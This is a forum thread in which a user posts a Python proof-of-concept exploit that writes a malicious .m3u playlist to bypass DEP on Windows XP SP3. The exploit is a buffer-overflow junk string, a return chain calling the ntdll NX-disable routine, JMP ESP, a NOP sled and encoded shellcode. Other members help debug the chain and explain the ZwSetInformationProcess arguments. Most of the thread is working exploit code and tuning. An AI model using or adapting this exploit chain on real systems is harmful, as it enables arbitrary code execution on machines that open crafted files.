Results 1 to 5 of 5

Thread: Help bypassing DEP windows XP SP3

  1. #1
    Just burned his ISO
    Join Date
    Dec 2007
    Posts
    9

    Default Help bypassing DEP windows XP SP3

    I am trying to bypass DEP on XP SP3. Everything is going well (I believe) until i run the routine to disable NX (7c91cd44). when the call to ntdll.ZwSetInformationProcess is made I noticed 3 arguments are being passed. Arg1 is FFFFFFFF, Arg2 is 00000022 and Arg3 is 0013ED50. However when the call returns EDX is set to FFFFFFFF and 0013ED50 now contains FFFFFFFF which is causing failure. I have posted the proof of concept I am working on below. Any ideas why this is occurring?


    Code:
    filename = "disabledep.m3u"
    
    # calc.exe
    shellcode =( 
    "\xda\xd3\xb8\xa4\x9b\x9d\x4a\xd9\x74\x24\xf4\x2b\xc9\xb1\x33"
    "\x5b\x31\x43\x17\x03\x43\x17\x83\x67\x9f\x7f\xbf\x9b\x48\xf6"
    "\x40\x63\x89\x69\xc8\x86\xb8\xbb\xae\xc3\xe9\x0b\xa4\x81\x01"
    "\xe7\xe8\x31\x91\x85\x24\x36\x12\x23\x13\x79\xa3\x85\x9b\xd5"
    "\x67\x87\x67\x27\xb4\x67\x59\xe8\xc9\x66\x9e\x14\x21\x3a\x77"
    "\x53\x90\xab\xfc\x21\x29\xcd\xd2\x2e\x11\xb5\x57\xf0\xe6\x0f"
    "\x59\x20\x56\x1b\x11\xd8\xdc\x43\x82\xd9\x31\x90\xfe\x90\x3e"
    "\x63\x74\x23\x97\xbd\x75\x12\xd7\x12\x48\x9b\xda\x6b\x8c\x1b"
    "\x05\x1e\xe6\x58\xb8\x19\x3d\x23\x66\xaf\xa0\x83\xed\x17\x01"
    "\x32\x21\xc1\xc2\x38\x8e\x85\x8d\x5c\x11\x49\xa6\x58\x9a\x6c"
    "\x69\xe9\xd8\x4a\xad\xb2\xbb\xf3\xf4\x1e\x6d\x0b\xe6\xc6\xd2"
    "\xa9\x6c\xe4\x07\xcb\x2e\x62\xd9\x59\x55\xcb\xd9\x61\x56\x7b"
    "\xb2\x50\xdd\x14\xc5\x6c\x34\x51\x39\x27\x15\xf3\xd2\xee\xcf"
    "\x46\xbf\x10\x3a\x84\xc6\x92\xcf\x74\x3d\x8a\xa5\x71\x79\x0c"
    "\x55\x0b\x12\xf9\x59\xb8\x13\x28\x3a\x5f\x80\xb0\x93\xfa\x20"
    "\x52\xec")
    
      
    junk = "\x41" * 1024
    adjust_ebp = "\xEA\xE3\xB5\x7C"			# PUSH ESP at 0x7CB5E3EA [shell32.dll] (PUSH ESP / POP EBP / RET 4)
    disabledep = "\xff\xff\xff\xff"			# offset for adjust_ebp (ret 4)
    disabledep += "\xA0\x25\x91\x7C"		# 7C9125A0 XOR EAX, EAX / INC EAX / RET - used to set AL to 1
    disabledep += "\xff\xff\xff\xff"
    disabledep += "\x44\xCD\x91\x7C"		# 7C91CD44 CMP AL,1 -> run NX Disable routine 
    disabledep += "\xD7\x30\x9D\x7C"		# 7C9D30D7 JMP ESP
    nop = "\x90" * 100          
     
    file = open(filename , 'w')
    file.write(junk + adjust_ebp + disabledep + nop + shellcode)
    file.close()
    
    raw_input("\nPress any key to exit...")

  2. #2
    Good friend of the forums
    Join Date
    Jun 2008
    Posts
    425

    Default Re: Help bypassing DEP windows XP SP3

    Hi this doesn't directly answer your question, but check out ROT

    I am trying to bypass DEP on XP SP3. Everything is going well (I believe) until i run the routine to disable NX (7c91cd44). when the call to ntdll.ZwSetInformationProcess is made I noticed 3 arguments are being passed. Arg1 is FFFFFFFF, Arg2 is 00000022 and Arg3 is 0013ED50. However when the call returns EDX is set to FFFFFFFF and 0013ED50 now contains FFFFFFFF which is causing failure. I have posted the proof of concept I am working on below. Any ideas why this is occurring?
    Does your program have permission to access that function, is edx point to a struct of the values passed, is eax passing 0x22. try setting a break point before Setinfo change eax to 0x22 and edx to struct and jmp to fastsystemcall and see if the values are the same



    eg

    string:dir/p/a
    system(string)

    change to
    push string
    push esp
    push ebp ---------------> might be back to frount
    push system address---->
    jmp to ret


    it is system specfic and network connection will be difficult but, added users and such should be a proable
    coffee

    http://www.ctyme.com/intr/rb-4249.htm
    Last edited by compaq; 01-01-2011 at 12:24 PM.

  3. #3
    Just burned his ISO
    Join Date
    Dec 2007
    Posts
    9

    Default Re: Help bypassing DEP windows XP SP3

    it looks like the call to zwSetInformationProcess does not clear the stack so when it returns I have those arguments pushed on the stack. Does anyone have a method to adjust the stack once the NX routine is finished?

  4. #4
    Just burned his ISO
    Join Date
    Oct 2009
    Posts
    13

    Default Re: Help bypassing DEP windows XP SP3

    To disable DEP for a process you need to make a all to NtSetInformationProcess() with the ProcessInformationClass set to ProcessExecuteFlags (0x22) and the ProcessInformation marker set to MEM_EXECUTE_OPTION_ENABLE (0x2)

  5. #5
    Good friend of the forums
    Join Date
    Jun 2008
    Posts
    425

    Default Re: Help bypassing DEP windows XP SP3

    it looks like the call to zwSetInformationProcess does not clear the stack so when it returns I have those arguments pushed on the stack. Does anyone have a method to adjust the stack once the NX routine is finished?
    junk = "\x41" * 101c

    jmp to shellcode eb ** = 0x12345678

    adjust_ebp = "\xEA\xE3\xB5\x7C" # PUSH ESP at 0x7CB5E3EA [shell32.dll] (PUSH ESP / POP EBP / RET 4)
    disabledep = "\xff\xff\xff\xff" # offset for adjust_ebp (ret 4)
    disabledep += "\xA0\x25\x91\x7C" # 7C9125A0 XOR EAX, EAX / INC EAX / RET - used to set AL to 1
    disabledep += "\xff\xff\xff\xff"
    disabledep += "\x44\xCD\x91\x7C" # 7C91CD44 CMP AL,1 -> run NX Disable routine

    jmp to jmp shellcode 0x12345678 ,below sets ebp to this
    disabledep += "\xD7\x30\x9D\x7C" # 7C9D30D7 JMP ESP
    jmp to ret = then jmps to jmp esp, and sets ebp to above


    can you copy a pic of the debugger


    nop = "\x90" * 100

Similar Threads

  1. Bypassing ASP validaterequest?
    By Liuser in forum Experts Forum
    Replies: 2
    Last Post: 08-18-2010, 05:28 PM
  2. Bypassing Firewalls in Ettercap + Wireshark
    By zals07 in forum Beginners Forum
    Replies: 1
    Last Post: 05-27-2010, 09:11 AM
  3. Bypassing Mac filter
    By Isohump in forum OLD Wireless
    Replies: 3
    Last Post: 01-18-2010, 07:33 PM
  4. Replies: 4
    Last Post: 06-17-2009, 01:04 PM
  5. Bypassing cisco PIX IOS v6.x.x with nmap question
    By demonize in forum OLD Newbie Area
    Replies: 5
    Last Post: 07-27-2008, 11:19 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •